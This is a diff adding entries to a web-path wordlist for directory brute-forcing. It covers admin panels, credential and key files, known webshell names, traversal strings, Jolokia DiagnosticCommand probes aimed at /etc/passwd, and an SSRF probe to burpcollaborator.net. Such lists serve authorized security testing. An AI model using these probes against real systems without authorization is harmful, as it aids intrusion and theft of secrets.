+controlpanel.htm controlpanel.html controlpanel.php +controlpanel.shtml controlpanel/ cookbooks cookie cookie.php +cookie_usage.php +cookies cookiesNotSupported.jsp +coppermine +copyright +core +core/fragments/moduleInfo.phtml core/latest/swagger-ui/index.html +corporate +count.%EXT% count_admin +counter +counters +coupons_admin_cp cover cover_db/ coverage coverage.data coverage.xml coverage/ +cowadmin cp +cp.%EXT% cp.html cp.php cp/ +cp/Shares?user=&protocol=webaccess&v=2.3 +cpadmin cpanel cpanel.php cpanel/ cpanel_file/ cpbackup-exclude.conf cpbt.php +cpg cpn.php +cpsadmin +crack craft/ crash.log +create_account.%EXT% +createmeta credentials credentials.csv credentials.json @@ -3830,7 +6550,10 @@ credentials.txt credentials.xml credentials/ credentials/gcloud.json +creo_admin +crm crm/ +cron cron.log cron.php cron.sh @@ -3841,17 +6564,35 @@ cron_sku.log crond/ crond/logs/ cronlog.txt +crossdomain.xml +crowd/console/login.action +crownadmin +crx/de/index.jsp +cs +cs-admin +cs_admin +csadmin +cscockpit cscockpit/ csdp.cache csp/gateway/slc/api/swagger-ui.html +css css.jsp css.php css1.jsp +csv csx/ +cubecart culeadora.txt +current +custom.%EXT% custom/ custom/db.ini +customavatars +customer +customer/user/signup customer_login/ +customers customers.csv customers.log customers.mdb @@ -3861,7 +6602,11 @@ customers.sqlite customers.txt customers.xls customize.jsp +cvs cvs/ +cvsadmin +cwadmin +d d.php d0main.php d0maine.php @@ -3879,9 +6624,20 @@ d897704943e335715e3589551c007622628fc9d1.jsp d89a1e68f81d5156cd4ec0b6e073def8203bdd56.jsp d99b32ab6dc6a0b437bbcfb6ff5c25b73e715372.jsp da2336a99bee703b174c263d5ef2365399f3316e.jsp +dad +dadmin dam.php +dasbhoard/ +dashboard +dashboard.%EXT% +dashboard/ +dashboard/faq.html +dashboard/howto.html +dashboard/phpinfo.php +dat dat.tar.gz dat.zip +data data-nseries.tsv data.jsp data.mdb @@ -3892,6 +6648,8 @@ data.txt data/ data/DoctrineORMModule/Proxy/ data/DoctrineORMModule/cache/ +data/adminer.php +data/autosuggest data/backups/ data/cache/ data/debug/ @@ -3925,12 +6683,14 @@ database_credentials.inc databases.yml datadog/ dataobject.ini +datasource date.jsp.txt davmail.log db db-admin db-admin/ db-full.mysql +db.%EXT% db.csv db.inc db.ini @@ -3971,6 +6731,7 @@ db_session.init.php db_status.php dba.jsp dbaccess.log +dbadmin dbadmin.php dbadmin/ dbadmin/index.php @@ -3991,13 +6752,19 @@ dbi.jsp dbs.jsp dbweb/ dc2a4efa67ec9670bae07478ca3c0ade3aefb1d3.jsp +dcadmin.cgi dcf3908bc77f30cbd88cec26b0a6719fccc3c7f0.jsp dd29ce7a3bfa9b892317f4b7ea7cca13c9e9aeed.jsp dd8294851aee7c3615461c60fdaefc4145140f34.jsp +de +de.%EXT% de31b3222630eb5450177b27005c0e031f667df5.jsp dead.letter +dealer_admin +dealeradmin debug debug-output.txt +debug.cgi debug.inc debug.log debug.php @@ -4006,11 +6773,22 @@ debug.txt debug.xml debug/ debug/pprof +debug/pprof/ +debug/pprof/goroutine?debug=1 +debug/pprof/heap +debug/pprof/profile +debug/pprof/trace debug_error.jsp ded5eb546aa78dec7a51fd4f249c4c1ef5ec91f9.jsp +default +default.%EXT% +default.htm +default2.%EXT% +delete delete.php dem0.jsp demo +demo.%EXT% demo.jsp demo.jsp?pwd=admin&cmd=ipconfig demo.php @@ -4018,6 +6796,7 @@ demo/ demo/ejb/index.html demo/ojspext/events/globals.jsa demo/sql/index.jsp +demoadmin demos/ denglu denglu/ @@ -4030,20 +6809,30 @@ deploy.rb deploy.sh deps deps/deps.jl +description.json +design desk/ desktop/ desktop/index_framed.htm +detail +details dev +dev.%EXT% dev.php dev/ devdata.db +devel devel/ devel_isolated/ +develop develop-eggs/ +developer +developers development-parts/ development.esproj/ development.log development/ +devels deviceupdatefiles_ext/ deviceupdatefiles_int/ devilzShell.jsp @@ -4052,57 +6841,119 @@ devshell.jsp df09b26aae0d3f7d0f5e0df411b688e0dea51488.jsp df_main.sql dfa8bd63142af1bb691c72e132b0e362b9963c3f.jsp +dfshealth.html dfshealth.jsp +dgadmin +dhadmin dhcp_log/ dialin/ +dialog/oauth/ +dir dir-login/ dir.php +diradmin dirb_random.jsp +directadmin directadmin/ +directory +directory.%EXT% +disclaimer +discus_admin +discus_admin_40 +dispatcher/invalidate.cache +display +display.%EXT% dist dist/ +django_lfc.egg-info/vPKG-INFO dkms.conf +dl +dlgadmin dlldata.c dm.jsp dms/AggreSpy dms/DMSDump dmx.jsp dns.alpha.kubernetes.io +doadmin doc doc/ doc/api/ +doc/en/changes.html +doc/html/index.html +doc/stable.version docker-compose-dev.yml docker-compose.yml docker/ +docpicker/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com +docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console docs docs.json docs/ +docs/CHANGELOG.html docs/_build/ +docs/changelog.txt +docs/export-demo.xml +docs/html/admin/ch01.html +docs/html/admin/ch01s04.html +docs/html/admin/ch03s07.html +docs/html/admin/index.html +docs/html/developer/ch02.html +docs/html/developer/ch03s15.html +docs/html/index.html +docs/maintenance.txt +docs/swagger.json +docs/updating.txt +docs51 doctrine/ doctrine/schema/eirec.yml doctrine/schema/tmx.yml documentation documentation/ documentation/config.yml +documents +dokuwiki dokuwiki/ dom.php +domain domcfg.nsf +domcfg.nsf/?open +domostroy.admin +donate door.php +dot +dotAdmin +down down.jsp down/ down/login down1.jsp +download +download.%EXT% download.jsp download/ download/history.csv download/users.csv downloadFile.php +downloader +downloader.%EXT% downloader/ downloader/cache.cfg downloader/connect.cfg +downloads downloads/ downloads/dom.php +dp +dpadmin.%EXT% dra.php +drp-exports +drp-publish +druid/coordinator/v1/leader +druid/coordinator/v1/metadata/datasources +druid/index.html +druid/indexer/v1/taskStatus +drupal +dsadmin dswsbobje/ dswsbobje/happyaxis.jsp duckrails/mocks/ @@ -4132,14 +6983,22 @@ dump/ dumper.php dumper/ dumps/ +dvdadmin +dvwa/ dwnb.txt.bx.jsp dwnb.txt.xm.jsp dwsync.xml dy.jsp +dyn dz.php dz0.php dz1.php +e +e-admin +e-mail +e107_admin e278a2011b9ebb9eeaa54d46eb8cb3f8f1f926b1.jsp +e2ePortalProject/Login.portal e303bc2ccd024c736d894cd088f7edd360578e89.jsp e322ff335ed9866caf9c0f15e2471873a2b4a7d3.jsp e45e1180934fae287e6843e9e38666fe29b4ac76.jsp @@ -4155,38 +7014,69 @@ e9060aa2caf96be49e3b6f490d08b8a996c4b084.jsp e98aa4fe2ab52392ae8051897b93566e3ecb9d79.jsp e9d1a110f494c0aae7ba506f2d5440e50df91f2c.jsp e9fcd44d77864312ec51f14a203046844e5c32a5.jsp +eadmin eagle.epf +eam/vib?id=/etc/issue +ebayadmin ec90200f4e2708faa21e371b2fc076c51412515f.jsp +ecadmin +ecartadmin ecc2ea54f0a1554637c75d5173de44c9644d764f.jsp ecf/ +echo ecosystem.json ecp/ ed2aa0d6782cc43cbd36dbad1f74ebc6de698f71.jsp +edit +edit-course edit.php edit_ot.jsp edit_user_pwd.jsp +editor editor.php editor/ editor/FCKeditor +editor/ckeditor/samples/ editor/stats/ +editor/tiny_mce editor/tiny_mce/ +editor/tinymce editor/tinymce/ editors/ editors/FCKeditor +editpost.%EXT% +editsiteadmin.%EXT% +editsiteadmins.%EXT% +education ee1d81cba39fb4877c803d32f17348d7cd36348f.jsp ee9408eb923f2d16f606a5aaac7e16b009797a07.jsp ef98ca135dfb9dcdd2f730b18e883adf50c4ab82.jsp eggs/ ehthumbs.db +ejb +ejbSimpappServlet +ekw_admin elastic/ elasticsearch/ elfinder/ elfinder/elfinder.php elm-stuff elmah.axd +email +email.%EXT% +email.htm email/ +email_admin +emailadmin +emailbox emails.jsp emails2.jsp +emailtofriend.%EXT% +emergency.php +emerils-admin +employment +en +en/admin/ encode-explorer.php encode-explorer_5.0/ encode-explorer_5.1/ @@ -4203,12 +7093,20 @@ encode_explorer-4.0/ encode_explorer.php encode_explorer/ encode_explorer_32/ +eng +engine engine.tar.gz engine.zip engine/ +engine/classes/swfupload//swfupload.swf +engine/classes/swfupload//swfupload_f9.swf engine/classes/swfupload/swfupload.swf engine/classes/swfupload/swfupload_f9.swf engine/log.txt +english +enteradmin +enterprise +entertainment env env.bak/ env.js @@ -4216,13 +7114,16 @@ env.json env.list env/ environment.rb +epsadmin erl_crash.dump err +err.%EXT% err.log err.txt error error-log error-log.txt +error.%EXT% error.asp error.cpp error.ctp @@ -4236,19 +7137,33 @@ error.tpl error.txt error.xml error/ +error/error.log +error1.tpl +error404.htm errorPages error_import error_log error_log.gz error_log.txt errorlog +errorpage.%EXT% +errors +errors.%EXT% errors.asp errors.log errors.tpl errors.txt errors/ errors/creation +errors/errors.log errors/local.xml +es +esadmin +esiInavlidator +estore +estore/annotated-index.html +estore/index.html +estore/populate etc etc/ etc/config.ini @@ -4260,31 +7175,52 @@ etcd-apiserver-client.key etcd-ca.crt etcd-events.log etcd.log +eticket eudora.ini eula.txt eula_en.txt +events +events_admin ews/ ex/jsp/simple.jsp. +examadmin +example +example.%EXT% example.php examples examples/ examples/jsp/%252e%252e/%252e%252e/manager/html/ +examples/jsp/index.html examples/jsp/snp/snoop.jsp examples/servlet/SnoopServlet +examples/servlets/index.html examples/servlets/servlet/CookieExample examples/servlets/servlet/RequestHeaderExample +examples/websocket/index.xhtml +examplesWebApp/EJBeanManagedClient.jsp +examplesWebApp/InteractiveQuery.jsp +examplesWebApp/OrderParser.jsp +examplesWebApp/SessionServlet +examplesWebApp/WebservicesEJB.jsp +examplesWebApp/index.jsp exception.log exchange/ +exchange/logon.%EXT% +exchange/root.%EXT% exchweb/ exec +expadmin expires.conf exploded-archives/ explore explore/repos export +export.%EXT% export.cfg export/ export_presets.cfg +express +expressInstall.swf ext/ ext/.deps ext/Makefile @@ -4297,10 +7233,14 @@ ext/missing ext/mkinstalldirs ext/modules/ ext/run-tests.php +extdirect extjs/ extjs/resources//charts.swf +extra_admin extras/documentation +ezadmin ezsqliteadmin/ +f f.jsp f09cc90eb405b506535de9511c54fff8c8543b9c.jsp f12.jsp @@ -4310,25 +7250,39 @@ f4927e1f9af642ef5ad4fb4bcecaad83dcc0de3d.jsp f86bce63215503313ca121ad2560c0c1e86fff15.jsp f8b09604ea074d94862d35fcd4e2c6032c66f834.jsp f8e821109bf34adcb88af9f0fb9a2d5e.jsp +f94admin f9b9b3cdb3e9a11e528aed1ef68182a0140a4b8d.jsp fa9997cb67fe248ef67d8bbcf6ebeecd1707818c.jsp fabric/ +faces/javax.faces.resource/web.xml?ln=../WEB-INF +faces/javax.faces.resource/web.xml?ln=..\\WEB-INF +faculty +fadmin fake-eggs/ +fantastico_fileslist.txt +faq +faq.%EXT% +faqs fastlane/Preview.html fastlane/readme.md fastlane/report.xml fastlane/screenshots fastlane/test_output +fault favicon.ico favicon.jsp fb29687c2e81f09596a7d29efdb47dc52d7a43b0.jsp fc7043aaac0ee2d860d11f18ddfffbede9d07957.jsp +fcadmin +fcgi-bin +fcgi-bin/ fcgi-bin/echo fcgi-bin/echo.exe fcgi-bin/echo2 fcgi-bin/echo2.exe fckeditor fckeditor/ +fckeditor/_samples/default.html fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx fckeditor/editor/filemanager/browser/default/connectors/php/connector.php @@ -4345,13 +7299,25 @@ fdsafkkebjhfgbx.jsp fead711bab09ddcd9d526d05529ef0c314565565.jsp features features.json +feed +feedback +feedback.%EXT% +feedback_js.js +feeds feixiang.php +fetch ff.jsp ff6e83c72acf21c58d67873de03ec26c31347731.jsp +file file.php +file/ file/index.jsp file12.jsp +fileRealm +fileRealm.properties +file_manager file_manager/ +file_upload file_upload.asp file_upload.aspx file_upload.cfm @@ -4370,9 +7336,12 @@ fileadmin/user_upload/ filedump/ filemanager filemanager/ +filemanager/upload.php filemanager/views/js/ZeroClipboard.swf filerun.php filerun/ +files +files.%EXT% files.7z files.md5 files.php @@ -4384,18 +7353,42 @@ files.zip files/ files/cache/ files/tmp/ +fileserver +fileupload fileupload/ filezilla.xml +filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file findbugs/ firebase-debug.log +fkadmin +flag +flag.%EXT% +flag.txt +flags +flash flash/ flash/ZeroClipboard.swf flashFXP.ini +flow/registries fluent.conf fluent_aggregator.conf flyway fmr.php +folder +fonts +footer +footer.%EXT% +footer_admin.%EXT% +forgot +forgot_pass.%EXT% +formadmin +formmail +forms +forms.%EXT% +formsadmin formslogin/ +forum +forum.%EXT% forum.rar forum.sql forum.tar @@ -4403,41 +7396,87 @@ forum.tar.bz2 forum.tar.gz forum.zip forum/ +forum/admin/ forum/install/install.php +forum/phpmyadmin/ +forum_admin +forum_arc.%EXT% +forum_professionnel.%EXT% +forumadmin +forumdisplay +forums forums/ forums/cache/db_update.lock fpadmin fpadmin/ +fpsample/ +fr framework/yiic.php +free freeline.py freeline/ freeline_project_description.json +freemail +freshadmin +frontend_admin +frontpg.ini +ftp ftp.txt fuck.jsp fuckjp.jsp fuel/app/cache/ fuel/app/config/ fuel/app/logs/ +full fun.jsp +funcion/ +funciones.%EXT% function.require +functions functions/ +fw.login.php +fzadmin +g +gadgets +gadmin +galeria +galeria/ +galerias +gallery +gallery.%EXT% +gallery/zp +gallery_admin +games ganglia/ gateway/ +gateway/routes gaza.php +gb_admin.%EXT% gbpass.pl gen/ +general +get get.php getElementById0000.jsp +getFavicon?host=burpcollaborator.net getFile.cfm +getcfg.php +getfiles.php +getior +gfx git-service git/ github-cache github-recovery-codes.txt github/ +gitlab gitlab/ gitlog +giveadmin gl/ +gladius/README.TXT global +global.%EXT% global.asa global.asa.bak global.asa.old @@ -4450,55 +7489,125 @@ global.asax.old global.asax.orig global.asax.temp global.asax.tmp +global.php +globaladmin +globaladminv2 globals globals.inc globals.jsa globes_admin/ +glossary +glpi glpi/ +go +go.%EXT% +google google-services.json +gotoURL.asp?url=google.com&id=43569 grabbed.html gradle-app.setting gradle/ grafana/ +graffiti-admin +graph +graphics +graphics.%EXT% +graphiql graphiql.php graphiql/ +graphiql/finland graphite/ +graphql +graphql-explorer graphql.js graphql.php graphql/ +graphql/console graphql/console/ +graphql/graphql +graphql/schema.json +graphql/schema.xml +graphql/schema.yaml grappelli/ graylog/ groovy/ +groovyconsole +group +group.%EXT% +groupadmin +groupadmin.%EXT% +groupcp.%EXT% groupexpansion/ gruntFile.js gruntfile.coffee gruntfile.js +gs/admin +gs/plugins/editors/fckeditor +gsadmin guanli guanli/ guanli/admin.asp guest.jsp +guide +guides guige.jsp guige02.jsp gulp-azure-sync-assets.js gulpfile.coffee gulpfile.js +gwadmin gwt-unitCache/ +h h2console +hTTgS.mdb ha.jsp +hac hac/ +hacsfiles +hadmin +handler +handler.%EXT% +handlers +handlers.%EXT% +handlers/ happyaxis.jsp haproxy/ +hardware +hc_admin he1p.jsp +head +head.%EXT% +header +header.%EXT% +header_admin.%EXT% +headers health health.json healthcheck.php +healthz heapdump heapdump.json +heip65_admin.nsf +hello +helloEJB +helloKona +helloWorld +hellouser hellouser.jsp +help +help.htm help.jsp +help/ +helpadmin +history +history.md +history.txt +hitcount +hmc hmc/ hndUnblock.cgi +home +home.%EXT% home.html home.php home.rar @@ -4506,13 +7615,20 @@ home.tar home.tar.bz2 home.tar.gz home.zip +homepage +homepage.nsf host-manager/ host-manager/html +host.key +hostadmin hosts +hotel_admin houtai houtai/ houtai/admin.asp +howto hpwebjetadmin/ +hradmin hs_err_pid.log hsxa.jsp hsxa1.jsp @@ -4521,17 +7637,23 @@ htaccess.bak htaccess.dist htaccess.old htaccess.txt +htadmin htdocs htgroup +html +html.%EXT% html.tar html.tar.bz2 html.tar.gz html.zip html/ +html/cgi-bin/ html/config.rb +html/js/misc/swfupload//swfupload.swf html/js/misc/swfupload/swfupload.swf html/js/misc/swfupload/swfupload_f9.swf htmlcov/ +htmldb htpasswd htpasswd.bak htpasswd/ @@ -4550,37 +7672,105 @@ httpd/logs/error_log httptrace hudson/ hudson/login +humans.txt hybridconfig/ +hypermail hystrix +hystrix.stream +i +i-admin i.php +i18nctxSample +i18nctxSample/ +i18nctxSample/docs/ iOSInjectionProject/ +i_admin +iadmin +ibm +ibm/console +ibm_security_logout ice.jsp +ice_admin icesword.jsp icinga/ +icon +icons +iconset id_dsa id_dsa.ppk id_rsa id_rsa.pub +ids_log.%EXT% +idx_config iiasdmpwd/ +iiop/ClientClose +iiop/ClientLogin +iiop/ClientRecv +iiop/ClientSend +iisadmin iisadmin/ +iisadmpwd/achg.htr +iisadmpwd/aexp.htr +iisadmpwd/aexp2.htr +iisadmpwd/aexp2b.htr +iisadmpwd/aexp3.htr +iisadmpwd/aexp4.htr +iisadmpwd/aexp4b.htr +iisadmpwd/anot.htr +iisadmpwd/anot3.htr +iishelp +iishelp/ +iishelp/iis/misc/default.asp +iissamples/ +iissamples/exair/howitworks/Code.asp +iissamples/exair/howitworks/Codebrw1.asp +iissamples/exair/howitworks/Codebrws.asp +iissamples/sdk/asp/docs/CodeBrws.asp +iissamples/sdk/asp/docs/codebrw2.asp +iissamples/sdk/asp/docs/codebrws.asp +image +image.%EXT% +images images/ +images/README images/Sym.php images/c99.php +images01 +images_admin +images_upload.%EXT% +images_upload/ +imail +img +img_admin +import import.php import/ import_error.log +importcockpit importcockpit/ +imprimer.%EXT% +imprint.html +in in.jsp in/ +inadmin inback3.jsp +inc +inc-admin inc/ inc/config.inc +inc/fckeditor inc/fckeditor/ +inc/tiny_mce inc/tiny_mce/ +inc/tinymce inc/tinymce/ include include/ +include/config.inc.%EXT% +include/fckeditor include/fckeditor/ +include_admin.%EXT% includes includes/ includes/adovbs.inc @@ -4598,68 +7788,117 @@ includes/fckeditor/editor/filemanager/connectors/php/upload.php includes/fckeditor/editor/filemanager/upload/asp/upload.asp includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx includes/fckeditor/editor/filemanager/upload/php/upload.php +includes/js/tiny_mce includes/js/tiny_mce/ includes/swfupload/swfupload.swf includes/swfupload/swfupload_f9.swf +includes/tiny_mce includes/tiny_mce/ +includes/tinymce includes/tinymce/ +incomming ind5k.jsp +index index-bak index-test.php +index.%EXT% +index.000 +index.001 +index.7z +index.backup +index.bak +index.bz2 +index.class +index.cs +index.gz index.htm index.html +index.inc +index.java +index.jsp index.jspx +index.old +index.orig +index.pHp index.php index.php-bak +index.php. index.php.bak +index.php/login/ index.php3 index.php4 index.php5 +index.php::$DATA index.php~ +index.rar +index.save +index.shtml index.tar index.tar.bz2 index.tar.gz +index.temp +index.tgz +index.tmp +index.vb index.xml index.zip +index1.bak +index1.htm index1.jsp index123.jsp +index2 +index2.bak index2.php index3.php index7833.jsp index_360desk.jsp +index_admin.%EXT% index_bak.jsp index_bak1.jsp index_blue.jsp index_desktop.jsp +index_files index_manage index_sys.jsp indexop.jsp.上传.jsp +index~ +index~1 influxdb/ info +info.%EXT% info.json info.jsp info.php info.txt +infophp.php +infor infos.php ingress.yaml +ini init/ +inlinemod.%EXT% +inlinemod.php inspector +instadmin instadmin/ install install-log.txt install-sh +install.%EXT% install.asp install.aspx install.bak install.htm install.html install.inc +install.log install.md install.mysql install.mysql.txt install.pgsql install.pgsql.txt install.php +install.php?profile=default install.rdf install.sql install.tpl @@ -4670,6 +7909,10 @@ install/update.log install_ install_manifest.txt install_mgr.log +installation +installation.htm +installation.html +installation.md installation.php installation/ installed.json @@ -4682,24 +7925,66 @@ installer_files/ install~/ instance/ integrationgraph +interadmin +internal +internal.%EXT% internal/docs +international +internet +intranet +intro +invisimail +invoker invoker/ +invoker/EJBInvokerServlet/ invoker/JMXInvokerServlet +invoker/JMXInvokerServlet/ invoker/readonly/JMXInvokerServlet invoker/restricted/JMXInvokerServlet io.swf +ip.txt +ip_configs/ ipch/ +ipython/tree +iradmin irc-macadmin/ +iredadmin irequest/ +irj/portal +is-bin/ isadmin isadmin.php +isapi/ +iso_admin ispmgr/ +issue/createmeta +issues +it it.jsp itt.jsp +ivt +ivt/ +ivt/ivtDate.jsp +ivt/ivtejb +ivt/ivtservler +ivt/ivtservlet +ivtejb +ivtserver +ivtservlet iwa/authenticated.aspx iwa/iwa_test.aspx +j +j2ee j2ee/servlet/SnoopServlet +j_security_check jacoco/ +jasperserver-pro +jasperserver/login.html +java +java-sys/ +javascript +javascript/editors/fckeditor +javascript/tiny_mce javascripts/bundles javax.faces.resource.../ javax.faces.resource.../WEB-INF/web.xml.jsf @@ -4713,6 +7998,7 @@ jboss/server/default/log/ jboss/server/minimal/deploy/project.ext jbossws/services jbpm-console/app/tasks.jsf +jcadmin jdbc jdbc.jsp jdkstatus @@ -4740,8 +8026,10 @@ jdni_weblogic_d05b68bf4523.jsp jdni_weblogic_d8918040e667.jsp jdni_weblogic_fc8471cbfdc3.jsp jenkins/ +jenkins/script jfolder01.jsp jira/ +jira/secure/Dashboard.jspa jjw.jspx jk-status jk/ @@ -4749,24 +8037,52 @@ jkmanager jkmanager-auth jkstatus jkstatus-auth +jkstatus/ +jkstatus; +jmssender +jmstrader +jmx jmx-console jmx-console/ jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo +jmxproxy jnfxsVoX.jsp jo.php job.jsp +jobadmin +jobs +join +joinrequests.%EXT% jolokia jolokia/ +jolokia/exec/ch.qos.logback.classic +jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd +jolokia/exec/com.sun.management:type=DiagnosticCommand/help/* +jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo +jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd +jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable +jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned +jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties +jolokia/exec/java.lang:type=Memory/gc jolokia/list +jolokia/list?maxObjects=100 +jolokia/read/java.lang:type=*/HeapMemoryUsage +jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used +jolokia/search/*:j2eeType=J2EEServer,* +jolokia/version +jolokia/write/java.lang:type=Memory/Verbose/true +joomla joomla.rar joomla.xml joomla.zip joomla/ joomla/administrator +js js/ js/FCKeditor js/ZeroClipboard.swf js/ZeroClipboard10.swf +js/config.js js/elfinder/elfinder.php js/envConfig.js js/prepod.js @@ -4775,29 +8091,40 @@ js/qa.js js/routing js/swfupload/swfupload.swf js/swfupload/swfupload_f9.swf +js/tiny_mce js/tiny_mce/ +js/tinymce js/tinymce/ js/yui/uploader/assets/uploader.swf +jscripts jscripts/ +jscripts/tiny_mce jscripts/tiny_mce/ jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php +jscripts/tinymce jscripts/tinymce/ jshell ver 0.1.jsp jshell ver 0.1.jsp~ jshell ver 1.0.jsp jshell.jsp +json +jsp jsp wget drag database.jsp.txt jsp-examples/ jsp-reverse.jsp jsp-reverse.jsp.txt jsp.jsp jsp.jspx +jsp/extension/login.jsp +jsp/help jsp/viewer/snoop.jsp jspShell.jsp jsp_File_browser.jsp jsp_custom_spy_for_mysql.jsp jspbd.jsp +jspbuild jspm_packages/ +jsps jspshall.jsp jspshall.jsp.txt jspspy.jsp @@ -4816,19 +8143,27 @@ jssresource/ juju/ junit/ jw.jspx +jwsdir +k k.jsp k81.jsp k8cmd.jsp +kadmin kafka/ kairosdb/ karma.conf.js kcfinder/ kcfinder/browse.php +key.pem +keyadmin +keygen keys.json kibana/ killer.php kkll.jsp +kmitaadmin known_tokens.csv +kontakt kpanel/ krb.log krblog.txt @@ -4839,26 +8174,69 @@ kube-scheduler.log kube/ kuber/ kubernetes/ +l +l-admin +l.%EXT% l0gs.txt +labels.rdf +ladmin lander.logs +lang +lang.%EXT% +lang/web.config +language +languages +languages.%EXT% +laravel +latest latest/meta-data/hostname latest/user-data layouts/ +lbadmin ldap.prop ldap.prop.sample ldap/ +learn/cubemail/dump.php +learn/cubemail/refresh_dblist.php +learn/cubemail/restore.php +learn/ruubikcms/extra/login/session.php +learn/ruubikcms/ruubikcms/cms/includes/dbconnection.php +learn/ruubikcms/ruubikcms/cms/includes/extrapagemenu.php +learn/ruubikcms/ruubikcms/cms/includes/footer.php +learn/ruubikcms/ruubikcms/cms/includes/head.php +learn/ruubikcms/ruubikcms/cms/includes/mainmenu.php +learn/ruubikcms/ruubikcms/cms/includes/multilang.php +learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php +learn/ruubikcms/ruubikcms/cms/includes/pagemenu.php +learn/ruubikcms/ruubikcms/cms/includes/required.php +learn/ruubikcms/ruubikcms/cms/includes/snippetmenu.php +learn/ruubikcms/ruubikcms/cms/includes/usersmenu.php +learn/ruubikcms/ruubikcms/cms/login/form.php +learn/ruubikcms/ruubikcms/tiny_mce/plugins/filelink/filelink.php +learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/error.log +learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_standalone.js.php +learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_tinymce.js.php +learn/ruubikcms/ruubikcms/website/scripts/jquery.lightbox-0.5.js.php +legal +lemardel_admin leo.jsp +lesson_admin letmein letmein.php letmein/ level +lfc/fixtures/superuser.xml +lfm.php +lg lg/ lg/lg.conf lia.cache lianan.jsp +lib lib-cov lib/ lib/bundler/man/ +lib/fckeditor lib/fckeditor/ lib/flex/uploader/.actionScriptProperties lib/flex/uploader/.flexProperties @@ -4868,40 +8246,68 @@ lib/flex/varien/.actionScriptProperties lib/flex/varien/.flexLibProperties lib/flex/varien/.project lib/flex/varien/.settings +lib/phpunit/Util/PHP/eval-stdin.php +lib/phpunit/phpunit/Util/PHP/eval-stdin.php +lib/phpunit/phpunit/phpunit +lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php +lib/phpunit/src/Util/PHP/eval-stdin.php +lib/tiny_mce lib/tiny_mce/ +lib/tinymce lib/tinymce/ lib64/ libes.jsp +libraries libraries/ libraries/phpmailer/ +libraries/tiny_mce libraries/tiny_mce/ +libraries/tinymce libraries/tinymce/ +library +library.%EXT% librepag.log +libs license license.md license.php license.txt license_key.php +liferay liferay.log liferay/ lighttpd.access.log lighttpd.error.log lilo.conf lindex.php +link +linkadmin +linkadmin.%EXT% linkhub/ linkhub/linkhub.log +links +links.%EXT% +linksadmin linktous.html linusadmin-phpinfo.php +linux liquibase +list list.jsp list1.jsp list_emails +listadmin listener.log +listinfo +lists lists/ lists/config lk/ lmYDlNFP.jsp load.php +local +local-cgi/ +local.%EXT% local.config.rb local.properties local.xml.additional @@ -4914,6 +8320,7 @@ local_bd_old.txt local_conf.php.bac local_conf.php.bak local_settings.py +localconfig localhost.sql localsettings.php.bak localsettings.php.dist @@ -4926,6 +8333,7 @@ log log-in log-in.php log-in/ +log.%EXT% log.htm log.html log.json @@ -4940,6 +8348,7 @@ log/authorizenet.log log/development.log log/error.log log/error_log +log/errors.log log/exception.log log/librepag.log log/log.log @@ -4953,6 +8362,8 @@ log/server.log log/test.log log/www-error.log log_1.txt +log_admin.%EXT% +log_data/ log_errors.txt log_in log_in.php @@ -4970,6 +8381,7 @@ login login-gulp.js login-redirect/ login-us/ +login.%EXT% login.asp login.cgi login.htm @@ -4977,10 +8389,22 @@ login.html login.json login.jsp login.php +login.pl +login.py +login.rb +login.shtml +login.srf +login.wdm%20 +login.wdm%2e login/ +login/admin/ login/admin/admin.asp +login/administrator/ +login/cpanel.%EXT% +login/cpanel/ login/index login/login +login/oauth/ login/super login1 login1.jspx @@ -4989,6 +8413,7 @@ login2.jsp login_2015.jsp login_admi login_admin +login_admin.%EXT% login_admin/ login_db/ login_ou.php @@ -5004,9 +8429,30 @@ loginsave/ loginsupe.php loginsuper loginsuper/ +logo +logo.gif logo_sysadmin/ +logoff +logoff.%EXT% +logon +logon.%EXT% +logon.htm +logon.html +logon.jsp +logon.py +logon.rb +logon/LogonPoint/index.html +logon/logon.%EXT% +logon/logon.html +logon/logon.jsp +logon/logon.pl +logon/logon.py +logon/logon.rb +logon/logon.shtml +logos logou.php logout +logout.%EXT% logout.asp logout.jsp logout/ @@ -5022,6 +8468,7 @@ logs/access.log logs/access_log logs/error.log logs/error_log +logs/errors.log logs/liferay.log logs/mail.log logs/proxy_access_ssl_log @@ -5033,11 +8480,15 @@ logs_backup/ logs_console/ logstash/ lol.php +lol/graphql +lostpassword ls.jsp ls.jspx +lsapp/ ltmain.sh luac.out luci.jsp.spy2009.jsp +m m.jsp m4/libtool.m4 m4/ltoptions.m4 @@ -5050,24 +8501,37 @@ ma1.jsp ma2.jsp ma3.jsp ma4.jsp +mac macadmin/ +madmin madspot.php madspotshell.php +magazine magic.default magmi/ magmi/conf/magmi.ini mail +mail.%EXT% +mail.html mail.log mail/ +mailadmin mailer/.env +mailform.%EXT% +mailman mailman/ mailman/listinfo +main +main.%EXT% main.jsp main.mdb main/ main/login +mainadmin maint.jsp maint/ +maintainers.txt +maintenance.%EXT% maintenance.flag maintenance.flag.bak maintenance.flag2 @@ -5076,34 +8540,67 @@ maintenance.php maintenance/ maintenance/test.php maintenance/test2.php +makeRequest +mambots +mambots/editors/fckeditor manage +manage.%EXT% manage.php manage.py manage/ manage/admin.asp +manage/fckeditor manage/login.asp +manage_admin manage_index +manage_main management management.php management/ management/configprops management/env manager +manager.%EXT% manager.php manager/ +manager/VERSION manager/admin.asp manager/html +manager/html/ 